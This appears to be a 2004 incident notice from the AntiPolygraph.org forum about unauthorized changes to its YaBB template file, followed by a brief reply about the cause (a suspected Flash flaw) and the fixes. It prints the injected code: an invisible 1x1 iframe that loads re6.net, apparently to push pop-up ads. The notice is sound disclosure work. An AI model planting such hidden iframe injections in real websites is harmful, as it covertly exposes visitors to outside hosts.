On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board (http://antipolygraph.org/cgi-bin/forums/YaBB.pl)'s template file was modified without authorization by an unknown person. The following text was inserted into the file:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:
http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx
The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.
Similar hacking incidents have been reported on other websites. See:
http://forums.hostreflex.com/showthread.php?p=1029#post1029
http://forums.eqdkp.com/index.php?showtopic=885
I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?
No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash (http://www.yabbforum.com/community/YaBB.pl?board=supp_nix;action=display;num=1084890828). In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.